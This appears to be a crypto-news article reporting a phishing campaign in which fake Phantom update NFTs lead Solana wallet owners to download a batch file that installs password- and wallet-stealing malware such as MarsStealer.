.png){kind=logo}
NFTs are Stealing Passwords in Name of Solana through Phantom
NFTs are Stealing Passwords from the Solana cryptocurrency owners using malware
NFTs are stealing passwords in the name of alerting the Solana cryptocurrency owners of a new Phantom security update to implant malware in their devices. This ongoing attack started two weeks ago, with NFTs titled 'PHANTOMUPDATE.COM' or 'UPDATEPHANTOM.COM' sent that claim to be warnings from the developers of Phantom. When opening the NFTs, wallet owners are told that a new security update has been released and that they should click the enclosed link or visit the site to download and install it. "Phantom requires all users to update their wallets. This must be done as soon as possible," reads the warning in the fake Phantom update NFT. "Failing to do so, may result in loss of funds due to hackers exploiting the Solana network. Visit www.updatePhantom.com to get the latest security update."
When visiting these sites from any device (desktop or mobile), the site automatically downloads a Windows batch file named Phantom_Update_2022-10-08.bat [VirusTotal] from DropBox. Previous campaigns were downloading executables named Phantom_Update_2022-10-04.exe. When the batch file is launched, it will check if it is running with Administrator privileges and, if not, show a Windows UAC prompt asking for permissions.
According to VirusTotal, the windll32.exe file is a password-stealing malware that attempts to steal browser information, such as history, cookies, and passwords, as well as SSH keys and other information. While it is unclear what specific password-stealing trojan is currently being spread, previous campaigns distributed a file name lib64.exe [VirusTotal], which was identified as MarsStealer. MarsStealer is an information-stealing malware launched in 2020 and steals data from all popular web browsers, two-factor authentication plugins, and multiple cryptocurrency extensions and wallets. The goal of this campaign is likely to steal cryptocurrency wallets and passwords that would allow the threat actors to steal all crypto funds and compromise other accounts belonging to the victim.
Join our WhatsApp Channel to get the latest news, exclusives and videos on WhatsApp
_____________
Disclaimer: Analytics Insight does not provide financial advice or guidance. Also note that the cryptocurrencies mentioned/listed on the website could potentially be scams, i.e. designed to induce you to invest financial resources that may be lost forever and not be recoverable once investments are made. You are responsible for conducting your own research (DYOR) before making any investments. Read more here.
